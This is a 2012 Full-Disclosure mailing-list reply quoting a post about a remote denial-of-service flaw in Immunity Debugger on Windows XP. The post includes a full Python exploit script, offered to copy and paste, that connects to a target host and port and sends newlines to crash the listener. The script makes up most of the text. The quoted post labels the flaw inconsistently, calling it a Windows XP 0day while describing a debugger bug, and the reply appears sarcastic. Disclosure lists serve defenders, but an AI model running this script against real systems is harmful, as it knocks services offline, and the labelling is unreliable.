-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Windows XP denial of service 0day found in CTF exercise
Oof, this is almost as bad as that BackTrack 0-day released the other day (http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/). Any response from Microsoft yet?

Justin C. Klein Keane
http://www.MadIrish.net

The PGP signature on this email can be verified using the public key at http://www.madirish.net/gpgkey

On 04/17/2012 02:48 AM, Adam Behnke wrote:
> Immunity Debugger Remote Denial of Service 0Day
> Tested against version 1.76 and 1.80 on Windows XP distributions
>
> Has not been tested for potential privilege escalation vectors.
>
> We first wrote about Immunity Debugger here:
> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>
> Discovered by a student that wishes to remain anonymous in the course CTF. This 0day exploit for Windows was discovered by a student in the InfoSec Institute Ethical Hacking class, during an evening CTF exercise. The student wishes to remain anonymous; he has contributed a python version of the 0day. A patch that can be applied to Windows has not been made available.
> You can find a python version of the exploit to copy and paste here:
>
>
> #!/usr/bin/python
> # Windows XP denial of service 0day exploit discovered on 4.9.12 by
> # InfoSec Institute student. For full write up and description go to
> # http://www.infosecinstitute.com/courses/ethical_hacking_training.html
> # (Python 2 syntax, as posted.)
>
> import sys
> import getopt
> import socket
>
>
> class Error(Exception):
>     def __init__(self, error):
>         self.errorStr = error
>
>     def __str__(self):
>         return repr(self.errorStr)
>
>
> class Exploit():
>
>     def __init__(self, targetHost, targetPort):
>         self.targetHost = targetHost
>         self.targetPort = targetPort
>
>     def exploit(self):
>         # Validate the address and open a TCP connection to the listener.
>         try:
>             socket.inet_aton(self.targetHost)
>             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>             s.connect((self.targetHost, self.targetPort))
>         except socket.error:
>             raise Error("Unable to exploit (Connect failed.)")
>
>         # exploit: the trigger is three bare newlines on the connection
>         try:
>             s.send("\n\n\n")
>         except socket.error:
>             raise Error("Unable to exploit (Exploit failed.)")
>         finally:
>             s.close()
>
>
> def usage():
>     print "[!] Usage:"
>     print " ( -h, --help ):"
>     print "     Print this message."
>     print " ( --targetHost= ): Target host."
>     print "     --targetHost=127.0.0.1"
>     print " ( --targetPort= ): Target port."
>     print "     --targetPort=8888"
>
>
> def main():
>     print "[$] Windows XP 0Day"
>     try:
>         opts, args = getopt.getopt(sys.argv[1:], "h",
>                                    ["help", "targetHost=", "targetPort="])
>     except getopt.GetoptError as err:
>         # Print help information and exit:
>         print '[!] Parameter error:' + str(err)  # e.g. "option -a not recognized"
>         usage()
>         sys.exit(0)
>
>     targetHost = None
>     targetPort = None
>     for opt, arg in opts:
>         if opt in ("-h", "--help"):
>             usage()
>             sys.exit(0)
>         elif opt == "--targetHost":
>             targetHost = arg
>         elif opt == "--targetPort":
>             targetPort = arg
>         else:
>             # getopt already rejects unknown options, so this is never reached.
>             print "[!] Parameter error."
>             usage()
>             sys.exit(0)
>
>     if not targetHost:
>         print "[!] Parameter error: targetHost not set."
>         usage()
>         sys.exit(0)
>
>     if not targetPort:
>         print "[!] Parameter error: targetPort not set."
>         usage()
>         sys.exit(0)
>
>     exploit = Exploit(targetHost, int(targetPort))
>
>     print "[*] Attempting to exploit:"
>     try:
>         exploit.exploit()
>     except Error as error:
>         print "[!] Exploit Error: %s" % (error.errorStr)
>         sys.exit(0)
>     print "[*] Exploit appears to have worked."
>
>
> # Standard boilerplate to call the main() function to begin
> # the program.
> if __name__ == '__main__':
>     main()
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
